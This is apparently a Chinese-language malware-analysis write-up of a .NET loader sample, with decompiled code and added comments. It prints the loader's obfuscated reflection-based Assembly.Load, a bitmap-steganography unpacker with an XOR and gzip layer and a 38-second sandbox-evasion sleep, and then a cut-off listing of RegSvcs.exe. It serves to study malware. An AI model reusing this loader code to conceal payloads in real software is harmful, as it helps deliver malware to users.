某cs读取资源文件样本执行分析
继续学习样本分析
原YouTube视频分析:https://www.youtube.com/watch?v=deG_-5opR30
样本地址:https://app.any.run/tasks/6cdbb3ea-a272-47d5-b01e-0a41a1ae16f3/
分析过程
下载下来发现是.NET程序,直接丢dnSpy反编译
跟随入口点
using System;
using System.Windows.Forms;
namespace WinFormsFirstOne
{
// Token: 0x02000013 RID: 19
internal static class Program
{
    // Token: 0x06000096 RID: 150 RVA: 0x000068AA File Offset: 0x00004AAA
    /// <summary>
    /// WinForms entry point of the sample. This is the standard designer-generated
    /// startup and contains nothing suspicious on its own; the interesting code is
    /// only reached through Form1 and the resource-handling method (Rate) that the
    /// write-up analyses further down.
    /// </summary>
    [STAThread]
    private static void Main()
    {
        Application.EnableVisualStyles();
        Application.SetCompatibleTextRenderingDefault(false); // application-wide default for the text-rendering property that some controls expose
        Application.Run(new Form1()); // starts the message loop; returns only when Form1 closes
    }
}
}
跟随第一个函数EnableVisualStyles
后续跟踪:
/// <summary>
/// System.Windows.Forms.Application.EnableVisualStyles (framework code, not part of
/// the sample). Temporarily asserts PathDiscovery so that the on-disk path of the
/// assembly defining Application can be read, then activates the native manifest
/// stored as resource 101 in that file.
/// </summary>
public static void EnableVisualStyles()
{
    string text = null;
    new FileIOPermission(PermissionState.None) // request the permission needed below
    {
        AllFiles = FileIOPermissionAccess.PathDiscovery // discovery of path information only (a path can reveal a user name or the directory layout); grants no access to file or folder contents
    }.Assert(); // callers further up the stack may now satisfy a PathDiscovery demand without being checked themselves
    try
    {
        text = typeof(Application).Assembly.Location; // on-disk path of the assembly that defines Application (this is a path, not resource data)
    }
    finally
    {
        CodeAccessPermission.RevertAssert(); // the assert must not outlive the single read above
    }
    if (text != null)
    {
        Application.EnableVisualStylesInternal(text, 101); // 101: id of the embedded manifest resource
    }
}
/// <summary>
/// Internal half of EnableVisualStyles: records whether a theming activation context
/// could be created for manifest resource <paramref name="nativeResourceID"/> inside
/// <paramref name="assemblyFileName"/>.
/// </summary>
private static void EnableVisualStylesInternal(string assemblyFileName, int nativeResourceID) // "EnableVisualStylesInternal" = enable visual styles, internal variant
{
    Application.useVisualStyles = UnsafeNativeMethods.ThemingScope.CreateActivationContext(assemblyFileName, nativeResourceID);
}
////////////////////////
/// <summary>
/// Creates, at most once per process, a Win32 activation context from the manifest
/// resource <paramref name="nativeResourceManifestID"/> inside <paramref name="dllPath"/>.
/// </summary>
/// <param name="dllPath">File that carries the manifest resource.</param>
/// <param name="nativeResourceManifestID">Integer resource id of the manifest.</param>
/// <returns>true if the context exists (created now or on an earlier call).</returns>
public static bool CreateActivationContext(string dllPath, int nativeResourceManifestID) // "native resource manifest id"
{
    Type typeFromHandle = typeof(UnsafeNativeMethods.ThemingScope);
    bool result;
    lock (typeFromHandle) // locks the Type object itself (publicly reachable); framework code, shown as decompiled
    {
        if (!UnsafeNativeMethods.ThemingScope.contextCreationSucceeded && OSFeature.Feature.IsPresent(OSFeature.Themes))
        {
            UnsafeNativeMethods.ThemingScope.enableThemingActivationContext = default(UnsafeNativeMethods.ThemingScope.ACTCTX);
            UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.cbSize = Marshal.SizeOf(typeof(UnsafeNativeMethods.ThemingScope.ACTCTX));
            UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.lpSource = dllPath; // module containing the manifest resource
            UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.lpResourceName = (IntPtr)nativeResourceManifestID; // integer id passed MAKEINTRESOURCE-style
            UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.dwFlags = 8U; // ACTCTX_FLAG_RESOURCE_NAME_VALID
            UnsafeNativeMethods.ThemingScope.hActCtx = UnsafeNativeMethods.ThemingScope.CreateActCtx(ref UnsafeNativeMethods.ThemingScope.enableThemingActivationContext); // Win32 CreateActCtx: builds the activation context
            UnsafeNativeMethods.ThemingScope.contextCreationSucceeded = (UnsafeNativeMethods.ThemingScope.hActCtx != new IntPtr(-1)); // -1 is INVALID_HANDLE_VALUE
        }
        result = UnsafeNativeMethods.ThemingScope.contextCreationSucceeded;
    }
    return result;
}
看完后仍然不知道真正的逻辑在哪里,返回到入口点查看new Form1。发现只是实例化各种窗口,完全没有有用信息
在一筹莫展的时候,跟着视频走。发现是直接分析资源文件处理函数
跟随到资源文件,可以看到定义的SAS变量
跟随Rate函数(以后找不到函数在哪里被使用,可以直接在dnSpy中对着那一行右键“分析”)
分析如下:
using System;
namespace WinFormsFirstOne
{
// Token: 0x02000009 RID: 9
/// <summary>
/// String constants used by the loader's reflection calls. Keeping the method name
/// in a field means "Load" never appears next to the reflection call in the IL.
/// </summary>
internal class Castle
{
    // Token: 0x04000032 RID: 50
    public static string Ir = "cnJCh"; // not referenced anywhere in this listing; looks like filler
    // Token: 0x04000033 RID: 51
    public static string Iq = "HvXUw"; // not referenced anywhere in this listing; looks like filler
    // Token: 0x04000034 RID: 52
    public static string Le = "Load"; // method name invoked on System.Reflection.Assembly by Rate()
}
}
InvokeMethod = 256,
/// <summary>
/// Returns <paramref name="s"/> with its characters in reverse order. The loader uses
/// it both to undo a reversed base64 payload and to hide method names ("ekovnI").
/// </summary>
/// <param name="s">Input string; must not be null.</param>
/// <returns>A new string containing the characters of <paramref name="s"/> back to front.</returns>
public static string Select(string s)
{
    var reversed = new StringBuilder(s.Length);
    for (int idx = s.Length - 1; idx >= 0; idx--)
    {
        reversed.Append(s[idx]);
    }
    return reversed.ToString();
}
// Token: 0x0600006C RID: 108 RVA: 0x00004BD0 File Offset: 0x00002DD0
/// <summary>
/// Stage-1 loader. Decodes the next stage from the embedded resource Resources.SAS,
/// loads it in memory via reflection and invokes one of its methods with
/// <paramref name="io"/>. Nothing from the resource is written to disk in this listing,
/// which is why the write-up resorts to a breakpoint on Assembly.Load to capture it.
/// </summary>
/// <param name="io">Arguments forwarded unchanged to the stage-2 method.</param>
/// <returns>The constant "Biara"; callers in this listing do not use it.</returns>
public string Rate(object[] io)
{
    // Resources.SAS is base64 obfuscated twice: every 'A' was replaced by the literal
    // "Quotes_on_Life" and the whole string was reversed. Undo both, then decode.
    byte[] array = Convert.FromBase64String(FarmDestination.Select(Resources.SAS.Replace("Quotes_on_Life", "A"))); // base64 decode
    // Equivalent to Assembly.Load(array): the type name is spelled with "@@@@@^" in place
    // of '.', the method name comes from Castle.Le ("Load") and BindingFlags.InvokeMethod
    // is 256, so neither "System.Reflection.Assembly" nor "Load" is visible as a plain
    // string next to the call.
    Assembly assembly = (Assembly)Type.GetType("System@@@@@^Reflection@@@@@^Assembly".Replace("@@@@@^", ".")).InvokeMember(Castle.Le, BindingFlags.InvokeMethod, null, null, new object[]
    {
        array
    }); // invokes the public static method (loads the decoded bytes): Assembly assembly = (Assembly)Type.GetType("System.Reflection.Assembly").InvokeMember("Load",256,null,null,new object[]{array})
    // Resolve the stage-2 type and method. Both names are mixed-script obfuscated;
    // LateBinding.LateGet (Microsoft.VisualBasic.CompilerServices) performs the call
    // by name, i.e. assembly.GetType("Dژ家ycحElj她s.的Fڵ是rn太Wظ").GetMethod("执ZciGڤjPز").
    MethodInfo o = (MethodInfo)LateBinding.LateGet(assembly.GetType("Dژ家ycحElj她s.的Fڵ是rn太Wظ"), null, "GetMethod", new object[]
    {
        "执ZciGڤjPز"
    }, null, null); // result: the MethodInfo of "Dژ家ycحElj她s.的Fڵ是rn太Wظ".执ZciGڤjPز
    // Select("ekovnI") == "Invoke": o.Invoke(null, io), i.e. run the static stage-2
    // method with the caller's arguments.
    LateBinding.LateGet(o, null, FarmDestination.Select("ekovnI"), new object[]
    {
        null,
        io
    }, null, null);
    return "Biara";
}
}
}
将SAS变量进行base64解码
1.将Quotes_on_Life替换为A
2.反转base64
3.base64解码
保存到文件,继续拖到dnspy分析,跟踪调用的 执ZciGڤjPز函数。发现是调用了几个函数后远程加载
跟踪هmyڕDئفTH函数
1.获取入口函数程序集所在的文件
2.创建一个新的ResourceManager
3.返回了个Bitmap
跟踪بظxئ家g希顾太太Bحه函数
(貌似是解密的算法)
跟踪c商ەڤG首首rءsە函数
从gzip流读取数据返回
一般这种情况需要断点Assembly.Load才能获取解密后的结果。然后作者把这个dump出来的文件,直接丢de4dot.exe然后就得到了解密的结果
最后确定入口点在(smethod_4函数):
using System;
using System.Collections.Generic;
using System.Drawing;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Resources;
using System.Text;
using System.Threading;
namespace ns1
{
// Token: 0x02000002 RID: 2
/// <summary>
/// Stage-2 unpacker (names as produced by de4dot). The payload is hidden in a bitmap
/// resource of the entry assembly: pixel bytes are extracted (smethod_2), XOR-decoded
/// with a string key (smethod_1), gzip-inflated (smethod_0) and finally loaded and run
/// in memory by <see cref="smethod_4"/>.
/// </summary>
public class GClass0
{
    // Token: 0x06000001 RID: 1 RVA: 0x00002064 File Offset: 0x00000264
    /// <summary>
    /// Last unpacking step: <paramref name="byte_0"/> is a 4-byte length (platform byte
    /// order, little-endian on Windows) followed by a gzip stream.
    /// </summary>
    /// <param name="byte_0">Length-prefixed gzip data, the output of smethod_1.</param>
    /// <returns>A buffer of the declared length filled from the gzip stream.</returns>
    public static byte[] smethod_0(byte[] byte_0)
    {
        byte[] result;
        using (MemoryStream memoryStream = new MemoryStream(byte_0))
        {
            byte[] array = new byte[4];
            memoryStream.Read(array, 0, 4);
            int num = BitConverter.ToInt32(array, 0); // declared decompressed size
            using (GZipStream gzipStream = new GZipStream(memoryStream, CompressionMode.Decompress))
            {
                byte[] array2 = new byte[num];
                // NOTE(review): a single Read may return fewer than num bytes and the code does
                // not loop; the author relies on the stream delivering everything at once.
                gzipStream.Read(array2, 0, num);
                result = array2;
            }
        }
        return result;
    }
    // Token: 0x06000002 RID: 2 RVA: 0x000020E4 File Offset: 0x000002E4
    /// <summary>
    /// XOR layer. Every input byte is XORed with a per-sample constant (last input byte
    /// ^ 112) and with the repeating ASCII key <paramref name="string_1"/>. The trailing
    /// byte, which only carries the constant, is dropped from the result.
    /// </summary>
    /// <param name="byte_0">Bytes extracted from the bitmap by smethod_2.</param>
    /// <param name="string_1">Key string; cycled byte by byte.</param>
    /// <returns>Decoded bytes, one shorter than the input.</returns>
    public static byte[] smethod_1(byte[] byte_0, string string_1) // XOR decode
    {
        byte[] bytes = Encoding.ASCII.GetBytes(string_1); // key bytes
        int num = (int)(byte_0[byte_0.Length - 1] ^ 112); // per-sample constant derived from the last input byte
        byte[] array = new byte[byte_0.Length + 1]; // one spare slot; trimmed below
        int num2 = 0; // key index, wraps at the key length
        for (int i = 0; i <= byte_0.Length - 1; i++)
        {
            array[i] = (byte)((int)byte_0[i] ^ num ^ (int)bytes[num2]);
            if (num2 == string_1.Length - 1)
            {
                num2 = 0;
            }
            else
            {
                num2++;
            }
        }
        Array.Resize<byte>(ref array, byte_0.Length - 1); // drop the last (constant-carrying) byte
        return array;
    }
    // Token: 0x06000003 RID: 3 RVA: 0x00002164 File Offset: 0x00000364
    /// <summary>
    /// Steganography carrier: walks the bitmap column by column (x outer, y inner) and
    /// appends the R, G, B bytes of every pixel that is not fully transparent black.
    /// </summary>
    /// <param name="bitmap_0">Bitmap resource returned by smethod_3.</param>
    /// <returns>Concatenated RGB triplets of the selected pixels.</returns>
    private static byte[] smethod_2(Bitmap bitmap_0)
    {
        List<byte> list = new List<byte>();
        checked // integer overflow throws instead of wrapping
        {
            int num = bitmap_0.Width - 1;
            for (int i = 0; i <= num; i++)
            {
                int num2 = bitmap_0.Height - 1;
                for (int j = 0; j <= num2; j++)
                {
                    Color pixel = bitmap_0.GetPixel(i, j);
                    if (pixel != Color.FromArgb(0, 0, 0, 0)) // skip ARGB(0,0,0,0) padding pixels
                    {
                        list.InsertRange(list.Count, new byte[] // same as AddRange
                        {
                            pixel.R,
                            pixel.G,
                            pixel.B
                        });
                    }
                }
            }
            return list.ToArray();
        }
    }
    // Token: 0x06000004 RID: 4 RVA: 0x00002208 File Offset: 0x00000408
    /// <summary>
    /// Looks up the resource named <paramref name="string_1"/> in the resource set
    /// "&lt;string_2&gt;.Properties.Resources" of the entry assembly.
    /// </summary>
    /// <param name="string_1">Resource name.</param>
    /// <param name="string_2">Root namespace of the entry assembly.</param>
    /// <returns>The resource as a Bitmap (InvalidCastException if it is not one).</returns>
    public static Bitmap smethod_3(string string_1, string string_2)
    {
        ResourceManager resourceManager = new ResourceManager(string_2 + ".Properties.Resources", Assembly.GetEntryAssembly());
        return (Bitmap)resourceManager.GetObject(string_1);
    }
    // Token: 0x06000005 RID: 5 RVA: 0x0000223C File Offset: 0x0000043C
    /// <summary>
    /// Entry point of this stage: waits, unpacks the final assembly from the bitmap
    /// resource, runs its entry point in the current process and then exits.
    /// </summary>
    /// <param name="string_1">Bitmap resource name (passed to smethod_3).</param>
    /// <param name="string_2">XOR key (passed to smethod_1).</param>
    /// <param name="string_3">Root namespace of the entry assembly (passed to smethod_3).</param>
    public static void smethod_4(string string_1, string string_2, string string_3)
    {
        Thread.Sleep(38000); // 38 s of inactivity before anything else happens; long enough to outlast short automated-analysis windows
        byte[] rawAssembly = GClass0.smethod_0(GClass0.smethod_1(GClass0.smethod_2(GClass0.smethod_3(string_1, string_3)), string_2)); // bitmap -> RGB bytes -> XOR -> gzip
        Assembly.Load(rawAssembly).EntryPoint.Invoke(0, null); // in-memory load; the boxed 0 is ignored for a static entry point
        Environment.Exit(0);
    }
    // Token: 0x04000001 RID: 1
    private string string_0 = "You will face many defeats in life, but never let yourself be defeated."; // not referenced by any method in this listing; reads like filler text
}
}
由于加密太多,过于繁琐。无法看到源代码静态分析执行了什么。只能丢沙箱了看看执行了什么,或者在运行的时候dump .NET内存
(最后是释放了个exe在执行)
作者使用了MegaDumper工具在运行的时候dump下来的exe:https://github.com/CodeCracker-Tools/MegaDumper
最后丢dnspy得到原始的代码
using System;
using System.EnterpriseServices;
using System.Globalization;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Runtime.Remoting;
using System.Text;
using System.Threading;
// Token: 0x02000003 RID: 3
/// <summary>
/// Command-line driver of the .NET Services Installation Tool (RegSvcs.exe): parses the
/// arguments, locates the target assembly and registers or unregisters its serviced
/// components through <see cref="RegistrationHelper"/>.
/// NOTE(review): this listing looks like the stock .NET Framework tool (version string
/// "4.7.3062.0" in PrintLogo); the dumped image therefore appears to be the host
/// process rather than the malicious payload — confirm against a known-good
/// RegSvcs.exe of that version.
/// </summary>
[ComVisible(false)]
public class RegSvcs
{
    // Token: 0x06000005 RID: 5
    // Win32 SearchPath: looks fileName up along the standard search path (path == null)
    // and writes the full path into buffer. Returns 0 on failure. filePart is declared as
    // int[] here and is always passed as null by FindAssembly.
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern int SearchPath(string path, string fileName, string extension, int numBufferChars, StringBuilder buffer, int[] filePart);
    // Token: 0x06000007 RID: 7 RVA: 0x0000209C File Offset: 0x0000029C
    /// <summary>
    /// Creates the <see cref="RegistrationHelper"/> that performs the COM+ registration.
    /// </summary>
    /// <param name="bCreateAppDomain">true to host the helper in a new AppDomain whose
    /// ApplicationBase is the target assembly's directory (so its dependencies resolve
    /// from there); false to use the current domain.</param>
    /// <param name="domain">The created domain (the caller unloads it), or null.</param>
    /// <returns>The helper, or null if the remote instance could not be created.</returns>
    private static RegistrationHelper GetRegistrationHelper(bool bCreateAppDomain, out AppDomain domain)
    {
        RegistrationHelper result = null;
        domain = null;
        if (!bCreateAppDomain)
        {
            result = new RegistrationHelper();
        }
        else
        {
            string directoryName = Path.GetDirectoryName(RegSvcs.regConfig.AssemblyFile);
            domain = AppDomain.CreateDomain("RegSvcs", null, new AppDomainSetup
            {
                ApplicationBase = directoryName
            });
            if (domain != null)
            {
                ObjectHandle objectHandle = domain.CreateInstance(typeof(RegistrationHelper).Assembly.FullName, typeof(RegistrationHelper).FullName);
                if (objectHandle != null)
                {
                    result = (RegistrationHelper)objectHandle.Unwrap();
                }
            }
        }
        return result;
    }
    // Token: 0x06000008 RID: 8 RVA: 0x00002124 File Offset: 0x00000324
    /// <summary>
    /// Resolves <paramref name="name"/> to a full path via Win32 SearchPath.
    /// </summary>
    /// <param name="name">File name or relative path given on the command line.</param>
    /// <returns>The full path, or null if SearchPath did not find the file.</returns>
    private static string FindAssembly(string name)
    {
        StringBuilder stringBuilder = new StringBuilder(261); // MAX_PATH + 1
        // numBufferChars is Capacity + 1: presumably to cover the terminator slot the
        // marshaller adds to the native buffer — verify before relying on it.
        if (RegSvcs.SearchPath(null, name, null, stringBuilder.Capacity + 1, stringBuilder, null) == 0)
        {
            return null;
        }
        return stringBuilder.ToString();
    }
    // Token: 0x06000009 RID: 9 RVA: 0x00002158 File Offset: 0x00000358
    /// <summary>
    /// Probes for <paramref name="name"/> by actually loading it by display name into the
    /// current AppDomain; any exception is treated as "not found". Despite the name this
    /// is a real load, not a GAC lookup, so anything resolvable on the probing path
    /// qualifies and stays loaded.
    /// </summary>
    private static bool IsAssemblyInGAC(string name)
    {
        try
        {
            Assembly assembly = Assembly.Load(name);
        }
        catch // every failure, including non-load exceptions, maps to false
        {
            return false;
        }
        return true;
    }
    // Token: 0x0600000A RID: 10 RVA: 0x00002188 File Offset: 0x00000388
    /// <summary>
    /// Process entry point. Delegates to <see cref="UnsafeMain"/> and converts any
    /// escaping exception into exit code 1 without printing it.
    /// </summary>
    /// <param name="args">Command-line arguments.</param>
    /// <returns>Process exit code.</returns>
    [MTAThread]
    public static int Main(string[] args)
    {
        int result;
        try
        {
            result = RegSvcs.UnsafeMain(args);
        }
        catch // swallowed: no diagnostics reach the user for this path
        {
            result = 1;
        }
        return result;
    }
    // Token: 0x0600000B RID: 11 RVA: 0x000021B4 File Offset: 0x000003B4
    /// <summary>
    /// Does the actual work of <see cref="Main"/>; exceptions other than the four
    /// handled below escape to the caller.
    /// </summary>
    /// <param name="args">Raw command-line arguments.</param>
    /// <returns>0 on success; otherwise the usage exception's return code, the COM error
    /// code of the failure when one is available, or 1.</returns>
    public static int UnsafeMain(string[] args)
    {
        AppDomain appDomain = null;
        RegSvcs.DoConsoleInitialization();
        try
        {
            RegSvcs.ParseArguments(args); // fills regConfig and the output flags from the command line
            if (RegSvcs.logoOutput)
            {
                RegSvcs.PrintLogo();
            }
            if (RegSvcs.regConfig.AssemblyFile != null)
            {
                string text = RegSvcs.FindAssembly(RegSvcs.regConfig.AssemblyFile);
                RegistrationHelper registrationHelper;
                if (text != null)
                {
                    // Found on disk: work in a separate AppDomain rooted at the assembly's directory.
                    RegSvcs.regConfig.AssemblyFile = text;
                    registrationHelper = RegSvcs.GetRegistrationHelper(true, out appDomain);
                }
                else
                {
                    // Not on the search path: accept it only if it loads by name.
                    if (!RegSvcs.IsAssemblyInGAC(RegSvcs.regConfig.AssemblyFile))
                    {
                        throw new RegistrationException(Resource.FormatString("RegSvcs_AssemblyNotFound", RegSvcs.regConfig.AssemblyFile));
                    }
                    registrationHelper = RegSvcs.GetRegistrationHelper(false, out appDomain);
                }
                // NOTE(review): GetRegistrationHelper can return null; that would surface as a
                // NullReferenceException in the generic catch below (exit code 1, "RegSvcs_UnknownError").
                if (RegSvcs.uninstallApplication)
                {
                    registrationHelper.UninstallAssemblyFromConfig(ref RegSvcs.regConfig);
                    if (RegSvcs.successOutput)
                    {
                        Console.WriteLine(Resource.FormatString("RegSvcs_UninstallSuccess", RegSvcs.regConfig.AssemblyFile));
                    }
                }
                else
                {
                    registrationHelper.InstallAssemblyFromConfig(ref RegSvcs.regConfig);
                    if (RegSvcs.successOutput)
                    {
                        // Message depends on which of partition / application were resolved.
                        if (RegSvcs.regConfig.Partition != null && RegSvcs.regConfig.Application != null)
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_InstallSuccess2", new string[]
                            {
                                RegSvcs.regConfig.AssemblyFile,
                                RegSvcs.regConfig.Application,
                                RegSvcs.regConfig.Partition,
                                RegSvcs.regConfig.TypeLibrary
                            }));
                        }
                        else if (RegSvcs.regConfig.Application != null)
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_InstallSuccess", RegSvcs.regConfig.AssemblyFile, RegSvcs.regConfig.Application, RegSvcs.regConfig.TypeLibrary));
                        }
                        else
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_NoServicedComponents"));
                        }
                    }
                }
            }
        }
        catch (UsageException ex)
        {
            // Bad or missing arguments: print usage text and exit with the code carried by the exception.
            if (RegSvcs.logoOutput)
            {
                RegSvcs.PrintLogo();
            }
            Console.WriteLine(ex.Message);
            return ex.ReturnCode;
        }
        catch (RegistrationException ex2)
        {
            // Registration failed: dump the chain, then prefer a COM HRESULT or the first
            // non-zero per-component error code as exit code, else 1.
            string msg;
            if (RegSvcs.uninstallApplication)
            {
                msg = Resource.FormatString("RegSvcs_UninstallError");
            }
            else
            {
                msg = Resource.FormatString("RegSvcs_InstallError");
            }
            RegSvcs.DumpExceptions(msg, ex2, false);
            if (ex2.InnerException != null)
            {
                if (ex2.InnerException is COMException)
                {
                    COMException ex3 = (COMException)ex2.InnerException;
                    if (ex3.ErrorCode != 0)
                    {
                        return ex3.ErrorCode;
                    }
                    return 1;
                }
            }
            else if (ex2.ErrorInfo != null) // only consulted when there is no inner exception
            {
                foreach (RegistrationErrorInfo registrationErrorInfo in ex2.ErrorInfo)
                {
                    if (registrationErrorInfo.ErrorCode != 0)
                    {
                        return registrationErrorInfo.ErrorCode;
                    }
                }
            }
            return 1;
        }
        catch (COMException ex4)
        {
            RegSvcs.DumpExceptions(Resource.FormatString("RegSvcs_CatalogError"), ex4, false);
            if (ex4.ErrorCode != 0)
            {
                return ex4.ErrorCode;
            }
            return 1;
        }
        catch (Exception e)
        {
            RegSvcs.DumpExceptions(Resource.FormatString("RegSvcs_UnknownError"), e, true); // ename: true prints the exception type as well
            return 1;
        }
        finally
        {
            if (appDomain != null)
            {
                AppDomain.Unload(appDomain); // domain created by GetRegistrationHelper(true, ...)
            }
        }
        return 0;
    }
    // Token: 0x0600000C RID: 12 RVA: 0x000024FC File Offset: 0x000006FC
    /// <summary>
    /// Picks a UI culture whose messages the console can actually display.
    /// </summary>
    private static void DoConsoleInitialization()
    {
        Thread.CurrentThread.CurrentUICulture = CultureInfo.CurrentUICulture.GetConsoleFallbackUICulture(); // fallback UI culture suited to console applications when the default GUI culture is not appropriate
        if (Console.OutputEncoding.CodePage != 65001 && Console.OutputEncoding.CodePage != Thread.CurrentThread.CurrentUICulture.TextInfo.OEMCodePage && Console.OutputEncoding.CodePage != Thread.CurrentThread.CurrentUICulture.TextInfo.ANSICodePage) // if the console is neither UTF-8 (65001) nor the culture's OEM/ANSI code page, fall back
        {
            Thread.CurrentThread.CurrentUICulture = new CultureInfo("en-US"); // set the culture to en-US
        }
    }
    // Token: 0x0600000D RID: 13 RVA: 0x00002584 File Offset: 0x00000784
    /// <summary>
    /// Prints <paramref name="msg"/> followed by a numbered line per exception in the
    /// InnerException chain; for a <see cref="RegistrationException"/> each
    /// per-component error entry is listed as well.
    /// </summary>
    /// <param name="msg">Heading line.</param>
    /// <param name="e">Outermost exception; its inner chain is walked.</param>
    /// <param name="ename">true to always include the exception type name (also done
    /// when the message is empty).</param>
    private static void DumpExceptions(string msg, Exception e, bool ename)
    {
        Console.WriteLine("\n" + msg);
        int num = 1; // 1-based position in the exception chain
        while (e != null)
        {
            if (ename || e.Message == null || e.Message.Length == 0)
            {
                Console.WriteLine(string.Concat(new object[]
                {
                    num,
                    ": ",
                    e.GetType().FullName,
                    " - ",
                    e.Message
                }));
            }
            else
            {
                Console.WriteLine(num + ": " + e.Message);
            }
            if (e is RegistrationException)
            {
                RegistrationErrorInfo[] errorInfo = ((RegistrationException)e).ErrorInfo;
                if (errorInfo != null)
                {
                    foreach (RegistrationErrorInfo registrationErrorInfo in errorInfo)
                    {
                        // NOTE(review): MinorRef is dereferenced without a null check — assumes the
                        // catalog always fills it; confirm.
                        if (registrationErrorInfo.MinorRef.ToLower(CultureInfo.InvariantCulture) != "<invalid>")
                        {
                            Console.WriteLine(string.Concat(new string[]
                            {
                                " ",
                                registrationErrorInfo.Name,
                                ".",
                                registrationErrorInfo.MinorRef,
                                ": ",
                                registrationErrorInfo.ErrorString
                            }));
                        }
                        else
                        {
                            Console.WriteLine(" " + registrationErrorInfo.Name + ": " + registrationErrorInfo.ErrorString);
                        }
                    }
                }
            }
            num++;
            e = e.InnerException;
        }
    }
    // Token: 0x0600000E RID: 14 RVA: 0x000026EE File Offset: 0x000008EE
    /// <summary>
    /// Prints the banner; the hard-coded "4.7.3062.0" identifies the framework build
    /// this copy of the tool shipped with.
    /// </summary>
    private static void PrintLogo()
    {
        Console.WriteLine(Resource.FormatString("RegSvcs_CopyrightMsg", "4.7.3062.0", CommonResStrings.CopyrightForCmdLine));
    }
    // Token: 0x0600000F RID: 15 RVA: 0x0000270C File Offset: 0x0000090C
    /// <summary>
    /// Case-insensitive test for a bare switch: "/check" or "-check".
    /// </summary>
    private static bool IsArgument(string arg, string check)
    {
        string b = arg.ToLower(CultureInfo.InvariantCulture);
        return "/" + check == b || "-" + check == b;
    }
    // Token: 0x06000010 RID: 16 RVA: 0x0000274C File Offset: 0x0000094C
    /// <summary>
    /// Test for a valued switch "/check:value" or "-check:value"; on a match
    /// <paramref name="prefix"/> receives the value (null if nothing follows the colon).
    /// A bare "/check" without a value also matches, via <see cref="IsArgument"/>.
    /// </summary>
    private static bool IsPrefixArgument(string arg, string check, ref string prefix)
    {
        string text = arg.ToLower(CultureInfo.InvariantCulture); // computed but never used
        prefix = null;
        // NOTE(review): the valued form is compared ordinally against the original arg, so it
        // is case-sensitive, while the bare form below is case-insensitive.
        if (arg.StartsWith("/" + check + ":", StringComparison.Ordinal) || arg.StartsWith("-" + check + ":", StringComparison.Ordinal))
        {
            if (arg.Length > check.Length + 2) // "/" + check + ":" is check.Length + 2 characters
            {
                prefix = arg.Substring(check.Length + 2);
            }
            return true;
        }
        return RegSvcs.IsArgument(arg, check);
    }
    // Token: 0x06000011 RID: 17 RVA: 0x000027C4 File Offset: 0x000009C4
    /// <summary>
    /// Parses the command line into <see cref="regConfig"/> and the output flags.
    /// Switches come first; the first token that is not a switch starts the positional
    /// part: assembly file [application name [type library]].
    /// </summary>
    /// <param name="args">Raw command-line arguments.</param>
    /// <exception cref="UsageException">On /? or /help, an unknown switch, or a wrong
    /// number of positional arguments.</exception>
    private static void ParseArguments(string[] args) // dispatches on the command-line switches
    {
        // Defaults: find-or-create the application, reconfigure if it exists, warn on the console.
        RegSvcs.regConfig.InstallationFlags = (InstallationFlags.FindOrCreateTargetApplication | InstallationFlags.ReconfigureExistingApplication | InstallationFlags.ReportWarningsToConsole);
        RegSvcs.logoOutput = true;
        RegSvcs.successOutput = true;
        RegSvcs.uninstallApplication = false;
        if (args.Length < 1)
        {
            throw new UsageException(0);
        }
        int i;
        for (i = 0; i < args.Length; i++)
        {
            string text = null; // receives the value of a "/switch:value" argument
            if (RegSvcs.IsArgument(args[i], "?") || RegSvcs.IsArgument(args[i], "help"))
            {
                throw new UsageException(0);
            }
            if (RegSvcs.IsArgument(args[i], "c"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.CreateTargetApplication;
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.FindOrCreateTargetApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "fc"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.FindOrCreateTargetApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "exapp"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~(InstallationFlags.CreateTargetApplication | InstallationFlags.FindOrCreateTargetApplication);
            }
            else if (RegSvcs.IsArgument(args[i], "extlb"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ExpectExistingTypeLib;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "tlb", ref text))
            {
                RegSvcs.regConfig.TypeLibrary = text;
            }
            else if (RegSvcs.IsArgument(args[i], "reconfig"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ReconfigureExistingApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "noreconfig"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.ReconfigureExistingApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "nologo"))
            {
                RegSvcs.logoOutput = false;
            }
            else if (RegSvcs.IsArgument(args[i], "quiet"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.ReportWarningsToConsole;
                RegSvcs.logoOutput = false;
                RegSvcs.successOutput = false;
            }
            else if (RegSvcs.IsArgument(args[i], "u"))
            {
                RegSvcs.uninstallApplication = true;
            }
            else if (RegSvcs.IsArgument(args[i], "componly"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ConfigureComponentsOnly;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "appname", ref text))
            {
                RegSvcs.regConfig.Application = text;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "parname", ref text))
            {
                RegSvcs.regConfig.Partition = text;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "appdir", ref text))
            {
                RegSvcs.regConfig.ApplicationRootDirectory = text;
            }
            else
            {
                // Anything that still looks like a switch is unknown; otherwise positional arguments begin here.
                if (args[i].StartsWith("/", StringComparison.Ordinal) || args[i].StartsWith("-", StringComparison.Ordinal))
                {
                    throw new UsageException(1, Resource.FormatString("RegSvcs_InvalidOption", args[i]));
                }
                break;
            }
        }
        if (i > args.Length) // cannot be true: the loop leaves i <= args.Length
        {
            throw new UsageException(1);
        }
        int num = args.Length - i; // number of positional arguments
        if (num == 0)
        {
            throw new UsageException(1, Resource.FormatString("RegSvcs_NotEnoughArgs"));
